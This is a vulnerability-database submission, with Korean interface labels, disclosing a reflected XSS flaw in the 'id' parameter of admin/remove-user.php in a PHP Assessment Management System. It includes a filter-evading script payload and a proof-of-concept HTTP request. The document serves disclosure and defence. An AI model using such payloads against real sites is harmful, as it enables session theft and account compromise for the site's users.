제출 #846715: Assessment Management System admin/remove-user.php Reflected XSS Vulnerability v1.0 Reflected XSS정보

제목Assessment Management System admin/remove-user.php Reflected XSS Vulnerability v1.0 Reflected XSS
설명# Assessment Management System admin/remove-user.php Reflected XSS Vulnerability A reflected cross-site scripting (XSS) vulnerability exists in the `admin/remove-user.php` file of the Assessment Management System. The application reflects user-controlled input from the `id` parameter into an HTML attribute without proper output encoding. As a result, an attacker can inject arbitrary JavaScript that executes in the browser of a victim who visits a crafted URL. ## ## Impact of the Vulnerability This vulnerability may allow an attacker to execute arbitrary JavaScript in the browser of a logged-in administrator or other authenticated user. Successful exploitation may lead to session theft, unauthorized actions, sensitive information disclosure, or account compromise within the application context. ## ## Payload ``` "><ScRiPt>alert(1)</sCrIpT> ``` "><ScRiPt>alert(1)</sCrIpT> ## Proof of Concept Send the following request to the vulnerable endpoint: ```http GET /admin/remove-user.php?id="><ScRiPt>alert(1)</sCrIpT> HTTP/1.1 Host: assessment Cookie: PHPSESSID=f11os756ltsdgbtk776pklo8cs ``` The application reflects the `id` parameter into the `value` attribute of the Username field without HTML escaping: ```html <input class="form-control" type="text" value="\"><ScRiPt>alert(1)</sCrIpT>" readonly> ``` The injected double quote closes the original `value` attribute, and the following `<script>` element is interpreted by the browser as executable HTML/JavaScript. This confirms the presence of a reflected XSS vulnerability in `admin/remove-user.php`. ## ## Source Download ``` [Assessment Management In PHP With Source Code - Source Code & Projects](https://code-projects.org/assessment-management-in-php-with-source-code/) ``` [Assessment Management In PHP With Source Code - Source Code & Projects](
원천⚠️ https://github.com/zzzxc643/CVE1/blob/main/assessment/vul4.md
사용자
 SSL_Seven_Security_Lab_WangZhiQiang_ZhanXiuChen (UID 97200)
제출2026. 06. 03. AM 07:07 (1 월 ago)
모더레이션2026. 07. 03. PM 08:50 (1 month later)
상태수락
VulDB 항목376170 [code-projects Assessment Management 1.0 /admin/remove-user.php 아이디 크로스 사이트 스크립팅]
포인트들20

Want to stay up to date on a daily basis?

Enable the mail alert feature now!